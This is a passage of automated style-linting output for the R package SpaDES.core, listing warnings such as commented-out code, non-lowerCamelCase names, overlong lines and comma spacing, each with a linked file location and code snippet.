^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:473:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/cache.R#L473) *style:* **Commented code should be removed.**\n```r\n​      # attr(object2, \"call\") <- attr(object, \"call\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:474:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/cache.R#L474) *style:* **Commented code should be removed.**\n```r\n​      # attr(object2, \"function\") <- attr(object, \"function\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:507:66:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/cache.R#L507) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  setGeneric(\".addTagsToOutput\", function(object, outputObjects, FUN) {\n                                                                 ^~~\n```\n[R/cache.R:530:48:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/cache.R#L530) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(object, outputObjects, FUN, preDigestByClass) {\n                                               ^~~\n```\n[R/cache.R:622:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/cache.R#L622) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​objSize.simList <- function(x, quick = getOption(\"reproducible.quick\", FALSE)) {\n^~~~~~~~~~~~~~~\n```\n[R/cache.R:649:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/cache.R#L649) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​makeMemoiseable.simList <- function(x) {\n^~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:657:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/cache.R#L657) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​unmakeMemoiseable.simList_ <- function(x) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/checkpoint.R:36:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/checkpoint.R#L36) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.checkpoint <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:86:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/code-checking.R#L86) *style:* **Lines should not be more than 100 characters.**\n```r\n​                xAsCall <- .isLastLineSim(x = x, xAsString = bb[seq(funStarts[yy], funEnds[yy + 1])])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:90:16:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/code-checking.R#L90) *style:* **Commented code should be removed.**\n```r\n​              #y = strsplit(bb[funStarts[yy]], split = \"\\\\s+\")[[1]][1]\n               ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:91:53:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/code-checking.R#L91) *style:* **Commas should always have a space after.**\n```r\n​              y <- paste0(cantCodeCheckMessage, \"'\",bb[funStarts[yy]], \"'\")\n                                                    ^\n```\n[R/code-checking.R:144:39:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/code-checking.R#L144) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​    if (identical(type, \"returnSim\")) { # This is intended for only the last line of a function\n                                      ^\n```\n[R/code-checking.R:182:48:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/code-checking.R#L182) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      } else if (identical(x[[1]], quote(`<-`)) ) {\n                                               ^\n```\n[R/code-checking.R:185:62:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/code-checking.R#L185) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​            if (any(grepl(x[[2]][[2]], pattern = \".envir\"))) {# i.e., sim@.envir\n                                                             ^\n```\n[R/code-checking.R:202:19:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/code-checking.R#L202) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​          x <- x[-(1:2)]\n                  ^\n```\n[R/code-checking.R:218:29:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/code-checking.R#L218) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​          x[[2]] <- x[[2]][-(1:2)]\n                            ^\n```\n[R/code-checking.R:286:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/code-checking.R#L286) *style:* **Lines should not be more than 100 characters.**\n```r\n​  allChecks <- list(simAssigns = simAssigns, simGets = simGets, returnsSim = returnsSim, assignToSim = assignToSim, fg = fg)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:319:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/code-checking.R#L319) *style:* **Lines should not be more than 100 characters.**\n```r\n​    allChecks[anyCantCodeCheck] <- lapply(names(cantCodeCheck[anyCantCodeCheck]), function(objName) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:368:51:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/code-checking.R#L368) *style:* **Commas should always have a space after.**\n```r\n​                                              \" \",verb,\" declared in outputObjects, \",\n                                                  ^\n```\n[R/code-checking.R:368:56:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/code-checking.R#L368) *style:* **Commas should always have a space after.**\n```r\n​                                              \" \",verb,\" declared in outputObjects, \",\n                                                       ^\n```\n[R/code-checking.R:384:20:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/code-checking.R#L384) *style:* **Commas should always have a space after.**\n```r\n​               \" \",verb,\" declared in inputObjects, \",\n                   ^\n```\n[R/code-checking.R:384:25:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/code-checking.R#L384) *style:* **Commas should always have a space after.**\n```r\n​               \" \",verb,\" declared in inputObjects, \",\n                        ^\n```\n[R/code-checking.R:395:90:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/code-checking.R#L395) *style:* **Commas should always have a space after.**\n```r\n​                                       paste0(paste(missingFrmMod, collapse = \", \"), \" \",verb,\n                                                                                         ^\n```\n[R/code-checking.R:440:75:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/code-checking.R#L440) *style:* **Commas should always have a space after.**\n```r\n​             \" but only for the 'get' functions, not the 'set' function \",\"\n                                                                          ^\n```\n[R/code-checking.R:454:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/code-checking.R#L454) *style:* **Lines should not be more than 100 characters.**\n```r\n​    missingInMetadata <- simAssignsNotInDotInputObjects[!(simAssignsNotInDotInputObjects %in% outputObjNames)]\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:463:24:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/code-checking.R#L463) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                       ^\n```\n[R/code-checking.R:463:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/code-checking.R#L463) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                                   ^\n```\n[R/code-checking.R:464:33:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/code-checking.R#L464) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in outputObjects\")\n                                ^\n```\n[R/code-checking.R:464:45:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/code-checking.R#L464) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in outputObjects\")\n                                            ^\n```\n[R/code-checking.R:471:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/code-checking.R#L471) *style:* **Lines should not be more than 100 characters.**\n```r\n​    missingInMetadata <- simAssignsInDotInputObjects[!(simAssignsInDotInputObjects %in% inputObjNames)]\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:480:24:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/code-checking.R#L480) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                       ^\n```\n[R/code-checking.R:480:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/code-checking.R#L480) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" assigned to sim inside \",\n                                   ^\n```\n[R/code-checking.R:481:33:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/code-checking.R#L481) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                ^\n```\n[R/code-checking.R:481:45:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/code-checking.R#L481) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                            ^\n```\n[R/code-checking.R:503:24:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/code-checking.R#L503) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" used from sim inside \",\n                       ^\n```\n[R/code-checking.R:503:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/code-checking.R#L503) *style:* **Commas should always have a space after.**\n```r\n​                   \" \",verbs[[fn]],\" used from sim inside \",\n                                   ^\n```\n[R/code-checking.R:504:33:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/code-checking.R#L504) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                ^\n```\n[R/code-checking.R:504:45:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/code-checking.R#L504) *style:* **Commas should always have a space after.**\n```r\n​                   fn, \", but \",verbs[[fn]],\" not declared in inputObjects\")\n                                            ^\n```\n[R/code-checking.R:516:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/code-checking.R#L516) *style:* **Commas should always have a space after.**\n```r\n​        \" \",verb,\" used from sim inside \",\n            ^\n```\n[R/code-checking.R:516:18:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/code-checking.R#L516) *style:* **Commas should always have a space after.**\n```r\n​        \" \",verb,\" used from sim inside \",\n                 ^\n```\n[R/code-checking.R:518:18:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/code-checking.R#L518) *style:* **Commas should always have a space after.**\n```r\n​        \", but \",verb,\" not declared in inputObjects\"\n                 ^\n```\n[R/code-checking.R:518:23:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/code-checking.R#L518) *style:* **Commas should always have a space after.**\n```r\n​        \", but \",verb,\" not declared in inputObjects\"\n                      ^\n```\n[R/code-checking.R:661:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/code-checking.R#L661) *style:* **Commented code should be removed.**\n```r\n​    #unique(pd[outerWh, \"line1\"])\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:665:34:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/code-checking.R#L665) *style:* **Commas should always have a space after.**\n```r\n​      whInner <- any((pd[outerWh,\"line1\"] < lwf) & (pd[outerWh,\"line2\"] > lwf) )\n                                 ^\n```\n[R/code-checking.R:665:64:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/code-checking.R#L665) *style:* **Commas should always have a space after.**\n```r\n​      whInner <- any((pd[outerWh,\"line1\"] < lwf) & (pd[outerWh,\"line2\"] > lwf) )\n                                                               ^\n```\n[R/code-checking.R:665:79:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/code-checking.R#L665) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      whInner <- any((pd[outerWh,\"line1\"] < lwf) & (pd[outerWh,\"line2\"] > lwf) )\n                                                                              ^\n```\n[R/copy.R:37:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/copy.R#L37) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​            sim_ <- object\n            ^~~~\n```\n[R/downloadData.R:54:96:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/downloadData.R#L54) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    io <- .parseModulePartial(sim, modules = list(module), defineModuleElement = \"inputObjects\" )\n                                                                                               ^\n```\n[R/downloadData.R:242:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/downloadData.R#L242) *style:* **Commented code should be removed.**\n```r\n​    # parsedModule <- parse(file = file.path(path, module, paste0(module, '.R')))\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:243:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/downloadData.R#L243) *style:* **Commented code should be removed.**\n```r\n​    # urls <- .getSourceURL(pattern = fileToDownload, x = parsedModule)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:250:8:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/downloadData.R#L250) *style:* **Commented code should be removed.**\n```r\n​      #urls <- moduleMetadata(module, path)$inputObjects$sourceURL\n       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:262:27:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/downloadData.R#L262) *style:* **Commas should always have a space after.**\n```r\n​    chksums2 <- chksums[0,]\n                          ^\n```\n[R/downloadData.R:263:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/downloadData.R#L263) *style:* **Commented code should be removed.**\n```r\n​    #children <- moduleMetadata(module, path)$childModules\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:266:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/downloadData.R#L266) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n            ^\n```\n[R/downloadData.R:266:18:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/downloadData.R#L266) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n                 ^\n```\n[R/downloadData.R:266:54:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/downloadData.R#L266) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n                                                     ^\n```\n[R/downloadData.R:266:56:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/downloadData.R#L266) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n                                                       ^\n```\n[R/experiment.R:200:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/experiment.R#L200) *style:* **Commented code should be removed.**\n```r\n​    #sim <- Copy(sim, objects = FALSE, queues = TRUE)\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:215:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/experiment.R#L215) *style:* **Commented code should be removed.**\n```r\n​    # cl <- tryCatch(getCluster(), error = function(x) NULL)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:216:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/experiment.R#L216) *style:* **Commented code should be removed.**\n```r\n​    # on.exit(if (!is.null(cl)) returnCluster(), add = TRUE)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:218:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/experiment.R#L218) *style:* **Commented code should be removed.**\n```r\n​    #if (length(modules) == 0) modules <- list(modules(sim)[-(1:4)])\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:222:11:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/experiment.R#L222) *style:* **Commented code should be removed.**\n```r\n​        # unlist(params[paramsTmp], recursive = FALSE)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:314:58:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/experiment.R#L314) *style:* **Commented code should be removed.**\n```r\n​            params(sim_)[[mod[x]]][[param[[x]]]] <- val #factorialExp[ind,x]\n                                                         ^~~~~~~~~~~~~~~~~~~\n```\n[R/helpers.R:230:74:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/helpers.R#L230) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​                             paste0(\"package:\", .pkgEnv$corePackagesVec[-(1:2)]))\n                                                                         ^\n```\n[R/helpers.R:260:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/helpers.R#L260) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​all.equal.simList <- function(target, current, ...) {\n^~~~~~~~~~~~~~~~~\n```\n[R/load.R:198:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/load.R#L198) *style:* **Lines should not be more than 100 characters.**\n```r\n​                names(argument) <- c(nam, names(formals(getFromNamespace(loadFun[y], loadPackage[y])))[1])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/misc-methods.R:467:55:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/misc-methods.R#L467) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​          (inherits(get(w, envir = envir), \"integer\")) ) {\n                                                      ^\n```\n[R/module-define.R:719:63:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/module-define.R#L719) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      exts <- na.omit(match(file_ext(fl), .fileExts[, \"exts\"]) )\n                                                              ^\n```\n[R/module-dependencies-class.R:53:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/module-dependencies-class.R#L53) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​            out.df <- data.frame(\n            ^~~~~~\n```\n[R/module-dependencies-class.R:172:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/module-dependencies-class.R#L172) *style:* **Commented code should be removed.**\n```r\n​    #   warning(\"input object data.frame should use colnames sourceURL.\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-dependencies-class.R:174:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/module-dependencies-class.R#L174) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    if ( !all(colnames(.outputObjects()) %in% colnames(object@outputObjects)) ) {\n        ^\n```\n[R/module-dependencies-class.R:174:78:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/module-dependencies-class.R#L174) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    if ( !all(colnames(.outputObjects()) %in% colnames(object@outputObjects)) ) {\n                                                                             ^\n```\n[R/module-dependencies-methods.R:43:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/module-dependencies-methods.R#L43) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- .depsEdgeListMem(deps, plot)\n    ^~\n```\n[R/module-dependencies-methods.R:56:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/module-dependencies-methods.R#L56) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  sim.in <- sim.out <- data.table(objectName = character(0),\n  ^~~~~~\n```\n[R/module-dependencies-methods.R:56:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/module-dependencies-methods.R#L56) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  sim.in <- sim.out <- data.table(objectName = character(0),\n            ^~~~~~~\n```\n[R/module-dependencies-methods.R:61:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/module-dependencies-methods.R#L61) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      z.in <- as.data.table(x@inputObjects)[, .(objectName, objectClass)]\n      ^~~~\n```\n[R/module-dependencies-methods.R:62:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/module-dependencies-methods.R#L62) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      z.out <- as.data.table(x@outputObjects)[, .(objectName, objectClass)]\n      ^~~~~\n```\n[R/module-dependencies-methods.R:65:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/module-dependencies-methods.R#L65) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​        sim.in <<- rbindlist(list(sim.in, z.in), use.names = TRUE)\n        ^~~~~~\n```\n[R/module-dependencies-methods.R:68:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/module-dependencies-methods.R#L68) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​        sim.out <<- rbindlist(list(sim.out, z.out), use.names = TRUE)\n        ^~~~~~~\n```\n[R/module-dependencies-methods.R:80:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/module-dependencies-methods.R#L80) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- dx[, list(from = module, to = i.module,\n    ^~\n```\n[R/module-dependencies-methods.R:83:15:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/module-dependencies-methods.R#L83) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    if (plot) DT <- DT[!duplicated(DT[, 1:2, with = FALSE]), ]\n              ^~\n```\n[R/module-dependencies-methods.R:85:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/module-dependencies-methods.R#L85) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- data.table(from = character(0), to = character(0),\n    ^~\n```\n[R/module-dependencies-methods.R:164:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/module-dependencies-methods.R#L164) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    M <- distances(simGraph, mode = \"out\")\n    ^\n```\n[R/module-dependencies-methods.R:196:39:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/module-dependencies-methods.R#L196) *style:* **`%>%` should always have a space before it and a new line after it, unless the full pipeline fits on one line.**\n```r\n​      missingObjects <- simEdgeList %>% filter(from != to) %>%\n                                    ~~^\n```\n[R/module-dependencies-methods.R:210:26:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/module-dependencies-methods.R#L210) *style:* **`%>%` should always have a space before it and a new line after it, unless the full pipeline fits on one line.**\n```r\n​    return(newEdgeList %>% data.table() %>% setorder(\"from\", \"to\", \"objName\"))\n                       ~~^\n```\n[R/module-dependencies-methods.R:246:79:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/module-dependencies-methods.R#L246) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​              loadOrder <- names(simGraph[[tsort, ]]) %>% .[!(. %in% \"_INPUT_\" )]\n                                                                              ^\n```\n[R/module-repository.R:28:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/module-repository.R#L28) *style:* **Lines should not be more than 100 characters.**\n```r\n​#'          (\\url{http://spades-core.predictiveecology.org/articles/ii-modules.html#module-directory-structure-modulename}),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:52:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/module-repository.R#L52) *style:* **Lines should not be more than 100 characters.**\n```r\n​    zipFiles <- grep(file.path(name, \"data\"), zipFiles, invert = TRUE, value = TRUE) # remove any zip in data folder\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:293:8:](https://github.com/PredictiveEcology/SpaDES.core/blob/4334935323c75ef567a084d0abe54a7187d36bd7/R/module-repository.R#L293) *style:* **Commented code should be 